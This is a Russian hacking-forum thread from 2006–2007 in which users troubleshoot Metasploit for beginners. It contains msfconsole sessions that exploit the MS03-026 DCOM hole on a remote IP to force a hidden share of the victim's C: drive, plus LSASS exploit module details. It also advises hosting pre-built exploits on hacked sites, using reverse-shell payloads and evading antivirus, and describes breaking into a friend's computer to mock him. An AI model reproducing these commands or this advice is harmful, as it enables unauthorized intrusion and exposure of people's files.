Авторские статьи Metasploit Framework для ламеров

Discussion in 'Статьи' started by -=lebed=-, 11 Jul 2006.

?
  1. Да, пользуюсь и доволен.

    51.2%
  2. Нет, он меня не устраивает, не нужен и т. п.

    14.8%
  3. А что это?

    34.0%
  1. slider

    slider Reservists Of Antichat

    Joined:
    4 Sep 2005
    Messages:
    501
    Likes Received:
    711
    Reputations:
    748
    ЛОЛ )))

    Ты наверн перепутал Cygwin c MSFConsole
     
  2. Jedi

    Jedi Guest

    Reputations:
    0
    slider Нет, не перепутал=)) Гороздо хуже)
    Сейчас переустанавил прогу, все работает. Я первый раз в момент установки, когда
    открывается командная строка и происходит extracting файлов, видать не дождался полностью распаковки, вырубил ее.
     
  3. UniquM

    UniquM New Member

    Joined:
    19 Jan 2007
    Messages:
    6
    Likes Received:
    0
    Reputations:
    0
    да аналогичная байда была! поставил щас 3 версию в общем существенно отличается от той что в статье! вместо к примеру win32_reverse там reverse_tcp причём всё приходится прописывать с путём( windows/shell/reverse_tcp а вообще всё настраивается чисто интуитивно но всё равно СПС за статью!
     
  4. ZeroCoo1

    ZeroCoo1 Guest

    Reputations:
    0
    я ламер ток почти ни чё не понял!и ваще вот пробую стучать всем в асю так называемым хацкерам ток не толку ни хто ни чё толком не может оюъяснить!"Спасибо одному челу который тратит на меня время=)
     
    1 person likes this.
  5. Jedi

    Jedi Guest

    Reputations:
    0
    Чет не фига не получается расшарить диск С в своей локалке с версией 2.7
    вот к примеру прописваю:
    msf > use msrpc_dcom_ms03_026
    msf use msrpc_dcom_ms03_026 > set RHOST 162.11.15.277 ( там точно не фаера)
    RHOST -> 162.11.15.277
    msf msrpc_dcom_ms03_026 > set PAYLOAD win32.exec
    PAYLOAD -> win32.exec
    msf msrpc_dcom_ms03_026<win32.exec> > set CMD 'net share "Share"'=C:\\'
    CMD -> net share "Share"=C:\
    msf msrpc_dcom_ms03_026<win32.exec> > exploit
    после чего пишет
    [*] Invalid payload for speciality win32.exec (что-то подобное)
    Где-то пол года назал туже самую операцию проводил с версией 2.5 все было нормально пакеты летели.
     
  6. UniquM

    UniquM New Member

    Joined:
    19 Jan 2007
    Messages:
    6
    Likes Received:
    0
    Reputations:
    0
    попробуй для PAYLOAD другой модуль взять не win32.exec
    и ты уверен что именно net share "Share"'=C:\\
    пашет в этой версии?
     
    #26 UniquM, 20 Jan 2007
    Last edited: 20 Jan 2007
  7. Jedi

    Jedi Guest

    Reputations:
    0
    UniquM да уже не уверен, в версии 2.5 получалось без проблем.
     
  8. -=lebed=-

    -=lebed=- хэшкрякер

    Joined:
    21 Jun 2006
    Messages:
    3,804
    Likes Received:
    1,960
    Reputations:
    594
    Я не понял, что ты переменой CMD присваиваешь... ИМХО должо быть так:
    set CMD "net share C$$=C:"
    будет супершара невидимая в сетевом окружении.
    А вообще почитай тут: http://forum.antichat.ru/thread20741.html

    и help посмотри по коммандам CMD
     
  9. -=lebed=-

    -=lebed=- хэшкрякер

    Joined:
    21 Jun 2006
    Messages:
    3,804
    Likes Received:
    1,960
    Reputations:
    594
    msf > info windows/exec

    Name: Windows Execute Command
    Version: 3534
    Platform: Windows
    Arch: x86
    Needs Admin: No
    Total size: 113

    Provided by:
    vlad902 <[email protected]>

    Basic options:
    Name Current Setting Required Description
    ---- --------------- -------- -----------
    CMD yes The command string to execute - командная строка для выполнения...
    EXITFUNC seh yes Exit technique: seh, thread, process

    правильно так:
    А значит в консоли MSF:
    set CMD net share имя_шары=c:
    (может в кавычки саму комманду CMD надо заключить, х.е.з), тогда так:
    set CMD "net share имя_шары=c:"
     
  10. UniquM

    UniquM New Member

    Joined:
    19 Jan 2007
    Messages:
    6
    Likes Received:
    0
    Reputations:
    0
    ещё вопрос где можно модулей накачать???
    на милворме вроде но жму на сплойт та где М стоит он открывает страницу пустую ну всмысле со значком МИЛВОРМ (не реклама) кто знает как слить их?
     
  11. UniquM

    UniquM New Member

    Joined:
    19 Jan 2007
    Messages:
    6
    Likes Received:
    0
    Reputations:
    0
    тут фишку допер, когда мы объявляем set CMD shutdown -s -c "LOL" к примеру то кавычки метасплойт сам убирает и что мы видем:
    CMD => shutdown -s -c LOL
    и консоль не выполняет команду но это в 3 версии
     
  12. -=lebed=-

    -=lebed=- хэшкрякер

    Joined:
    21 Jun 2006
    Messages:
    3,804
    Likes Received:
    1,960
    Reputations:
    594
    Тут модули на перле для MSF 2.7 http://metasploit.com/projects/Framework/

    Модули на руби, имхо только в составе пакета MSF 3.0
     
  13. -=lebed=-

    -=lebed=- хэшкрякер

    Joined:
    21 Jun 2006
    Messages:
    3,804
    Likes Received:
    1,960
    Reputations:
    594
    По многочисленным просьбам (тех кто голосовал за третий вариант): Видео к этой статье "Убиваем троя" (или убиваем Смерть Ламера :D )
    качать (3,5 мб. в RAR)

    P.S. Надёюсь увидим скоро на VIDEO.ANTICHAT.RU (отправил на сайт)
     
    #33 -=lebed=-, 28 Feb 2007
    Last edited: 28 Feb 2007
    1 person likes this.
  14. Prodi

    Prodi New Member

    Joined:
    22 Mar 2007
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    Скажите пожалуйста.
    Все ли exploit-ы работают по принципу -"Сначало на жертву загружается файл, только потом доступ"???
    Архи неудобно, т.к. невстретил я ещё пока "начинку" которая не просекалась бы антивирусами "жертвы" ...

    Быть может всётаки есть такие exploit-ы, которые используют такие "дыры" которые можно "поиметь" не "смазывая начинкой" (т.е. не заливая туда ту часть которая "палится" антивирусами).

    -Заранее благодарен за ответ.
     
  15. iv.

    iv. Elder - Старейшина

    Joined:
    21 Mar 2007
    Messages:
    1,183
    Likes Received:
    438
    Reputations:
    107
    пожалуйста.
    есть эксплоиты локальные, есть удаленные. в случае с удаленными ничего "загружать на жертву" не нужно..
     
  16. -=lebed=-

    -=lebed=- хэшкрякер

    Joined:
    21 Jun 2006
    Messages:
    3,804
    Likes Received:
    1,960
    Reputations:
    594
    Недопёр ты концепцию! Есть сплоит - код, использующий уязвимость для захвата управления (повышения привилегий и т. д). А есть начинка - полезная нагрузка - код которому будет переданно управление в результате работы сплоита.
    Палятся антивирем сами сплоиты (локальные). Удалённым сплоитам (атакующим сетевые сервисы) также может противодействовать антивирь (KIS 6.0 например) он же и файрвол и ids.

    Есть удалённый сплоит, изпользующий уязвимость в сервисе DCOM (LSASS), но эта дырка есть в WIN-XP-SP1 (непропатченной) - а таких систем в интернете всё меньше и меньше. Эту же дырку используют сетевые черви (типа MSBlast).


    Вот он в пакете (MSF ver. 3.0 beta 3)
    Code:
    msf > use windows/smb/ms04_011_lsass
    msf exploit(ms04_011_lsass) > info windows/smb/ms04_011_lsass
    
           Name: Microsoft LSASS Service DsRolerUpgradeDownlevelServer Overflow
        Version: 4084
       Platform: Windows
     Privileged: Yes
        License: Metasploit Framework License v1.0
    
    Provided by:
      hdm <[email protected]>
    
    Available targets:
      Id  Name                  
      --  ----                  
      0   Automatic Targetting  
      1   Windows 2000 English  
      2   Windows XP English    
    
    Basic options:
      Name       Current Setting  Required  Description                                               
      ----       ---------------  --------  -----------                                               
      Proxies                     no        proxy chain                                               
      RHOST                       yes       The target address                                        
      RPORT      445              yes       Set the SMB service port                                  
      SMBDOM     WORKGROUP        no        The Windows domain to use for authentication              
      SMBDirect  True             yes       The target port is a raw SMB service (not NetBIOS)        
      SMBNAME    *SMBSERVER       yes       The NetBIOS hostname (required for port 139 connections)  
      SMBPASS                     no        The password for the specified username                   
      SMBUSER                     no        The username to authenticate as                           
      SSL                         no        Use SSL                                                   
    
    Payload information:
      Space: 1024
      Avoid: 7 characters
    
    Description:
      This module exploits a stack overflow in the LSASS service, this 
      vulnerability was originally found by eEye. When re-exploiting a 
      Windows XP system, you will need need to run this module twice. 
      DCERPC request fragmentation can be performed by setting 'FragSize' 
      parameter.
    
    References:
      http://www.securityfocus.com/bid/10108
      http://cve.mitre.org/cgi-bin/cvename.cgi?name=2003-0533
      http://www.osvdb.org/5248
      http://www.microsoft.com/technet/security/bulletin/MS04-011.mspx
      http://milw0rm.com/metasploit.php?id=36
    
     
  17. gremoz

    gremoz New Member

    Joined:
    29 Oct 2006
    Messages:
    3
    Likes Received:
    2
    Reputations:
    0
    А если у меня доступ в инет из локалки, и к компьютеру фактически не возможно обратиться из вне. (f.e. недоступен апач из инет установленый на машине )
    Можно сделать HTTPHOST адрес другого хоста (например существующего хостинга ) и слушать с него? Соответственно и впаривать другой адрес.
     
  18. -=lebed=-

    -=lebed=- хэшкрякер

    Joined:
    21 Jun 2006
    Messages:
    3,804
    Likes Received:
    1,960
    Reputations:
    594
    Сам подумай... Как ты повесишь сервер метасплоита на чужом хосте? А вот предварительно сгенерированный (и настроенный под себя) сплоит можно повесить на своём сайте или на чужом (взломанном).
    1. По сабжу (чтоб доступен был сервер MSF из инета): настраивай редирект на роутере (или NAT) с внешнего IP на локальный.
    2. Используй переменную REALHOST - внешний IP (WAN) - но это имхо актуально, для удалённых слоитов, при атаке на сервисы и для начинок, использующих connectback (реверс) способ соединения.
     
  19. -=lebed=-

    -=lebed=- хэшкрякер

    Joined:
    21 Jun 2006
    Messages:
    3,804
    Likes Received:
    1,960
    Reputations:
    594
    Тут GreenBear наконец-то выложил моё видео по использованию пакета 2.7. В видео показываем как мы взламываем систему друга с помощью сплоита+реверсшелл, чтоб поглумиться над ним, обнаруживаем у него признаки наличия трояна Смерть Ламера, проникаемся к нему сочувствием :D и избавляем его от троя удалённо (сносим файл сервера троя антивирусом касперского, но этого мало, трой снова себя восстанавливает - он есть в процессах, находим подозрительно-левый процесс и пытаемся его удалённо убить - получается только с третьего раза с параметром "принудительно", затем находим автозагружаемый файл сервера трояна и тоже убиваем его антивирем). ;)
     
  20. Piflit

    Piflit Banned

    Joined:
    11 Aug 2006
    Messages:
    1,249
    Likes Received:
    585
    Reputations:
    31
    C:\Program Files\Metasploit\Framework3\tools>"C:\Program Files\Metasploit\Framew
    ork3\msfupdate.cmd"
    [*] Updating the Metasploit Framework...
    Skipped '.'
    Для продолжения нажмите любую клавишу . . .

    Что значит "пропущена '.'"?

    Metasploit Framework user (09.05.2007. 10:33:27)
    При запуске msfweb.cmd выдает ошибку:

    C:\\>ruby "\\msfweb" -s
    "ruby" не является внутренней или внешней
    командой, исполняемой программой или пакетным файлом.
    C:\\>pause
    Для продолжения нажмите любую клавишу . . .

    надо установить ruby? можно поподробнее.
    заранее спасибо

    ЗЫ поставил бы по плюсику за каждую статью из всей серии :)